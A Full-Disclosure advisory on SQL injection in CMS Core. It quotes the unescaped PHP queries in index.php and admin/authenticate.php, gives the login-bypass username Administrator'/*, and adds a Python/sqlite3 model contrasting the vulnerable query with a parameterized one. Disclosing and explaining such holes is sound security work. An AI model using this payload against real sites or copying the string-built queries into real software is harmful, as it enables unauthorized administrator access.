
[Full-Disclosure] CMScore advisory



SQL injection bugs in CMScore

/*==========================================*/
// GHC -> CMS CORE <- ADVISORY
// Product: CMS Core
// URL: http://chipmunk-scripts.com/scripts/cmscore.php
// VULNERABILITY CLASS: SQL injection
// RISK: high
/*==========================================*/

[1] script name: index.php

---[code]---
$EntryID=$_GET['EntryID'];   // untrusted value taken straight from the query string
...
$article="SELECT * FROM CMS_articles where EntryID='$EntryID'";   // interpolated into the SQL text without escaping
---[/code]---

Possible SQL injection: 
http://CMScore/index.php?EntryID=[SQL code]

[2] script name: index.php

---[code]---
$searchterm=$_POST['searchterm'];   // untrusted value from the search form
...
// $searchterm is interpolated three times into the SQL text without escaping
$newselect="Select * FROM CMS_articles where title LIKE '%$searchterm%' OR shortdescription LIKE '%$searchterm%' OR body LIKE '%$searchterm%' order by EntryID DESC LIMIT $start, $numentries";
---[/code]---

Possible SQL injection through the $searchterm variable from the search form.

[3] script name: admin/authenticate.php

---[code]---
  $username=$_POST['username'];   // untrusted value from the login form
  $password=$_POST['password'];
  $password=md5($password);       // the password is hashed before use, the username is not touched
  $query = "select * from CMS_logintable where username='$username' and password='$password'";   // $username interpolated without escaping
  $result=mysql_query($query) or die("Could not Query");
---[/code]---

Possible SQL injection through the $username variable.

[exploit]
Log in with username
Administrator'/*
from admin/index.php page.

[note]
"Administrator" must be a valid user name.
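To show why the string-building pattern in admin/authenticate.php is exploitable and how a parameterized query closes it, here is an added Python/sqlite3 model of that logic (not code from CMS Core or from the advisory author); the in-memory table, the account password and the function names are constructed for this example.

```python
import hashlib
import sqlite3


def make_db():
    # Constructed stand-in for CMS_logintable (assumption: the two columns the
    # advisory's query references; MD5 is kept only to mirror the original code).
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE CMS_logintable (username TEXT, password TEXT)")
    db.execute("INSERT INTO CMS_logintable VALUES (?, ?)",
               ("Administrator", hashlib.md5(b"s3cret-example").hexdigest()))
    return db


def login_vulnerable(db, username, password):
    # Mirrors admin/authenticate.php: the username is spliced into the SQL
    # text, so a quote character in it changes the structure of the query.
    pw = hashlib.md5(password.encode()).hexdigest()
    query = (f"select * from CMS_logintable where username='{username}' "
             f"and password='{pw}'")
    return db.execute(query).fetchone() is not None


def login_safe(db, username, password):
    # Hardened form: the driver binds both values as data, so the username
    # can never become part of the SQL text.
    pw = hashlib.md5(password.encode()).hexdigest()
    query = "select * from CMS_logintable where username=? and password=?"
    return db.execute(query, (username, pw)).fetchone() is not None


def demo():
    db = make_db()
    payload = "Administrator'/*"   # the login name quoted in the advisory
    return {
        "vuln_valid": login_vulnerable(db, "Administrator", "s3cret-example"),
        "vuln_wrong_pw": login_vulnerable(db, "Administrator", "wrong"),
        "vuln_payload": login_vulnerable(db, payload, "anything"),
        "safe_valid": login_safe(db, "Administrator", "s3cret-example"),
        "safe_payload": login_safe(db, payload, "anything"),
    }


if __name__ == "__main__":
    print(demo())
```

With the vulnerable query the `/*` comments out the password check, so the login succeeds without the password; with bound parameters the same input is just a username that does not exist.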

/* ================================================== */
/* www.ghc.ru -- security games & challenges          */
/* ================================================== */
/* greets to: 1dt.w0lf & RST.void.ru, D0G4            */
/* & all quest hunters %)                             */
/* ================================================== */
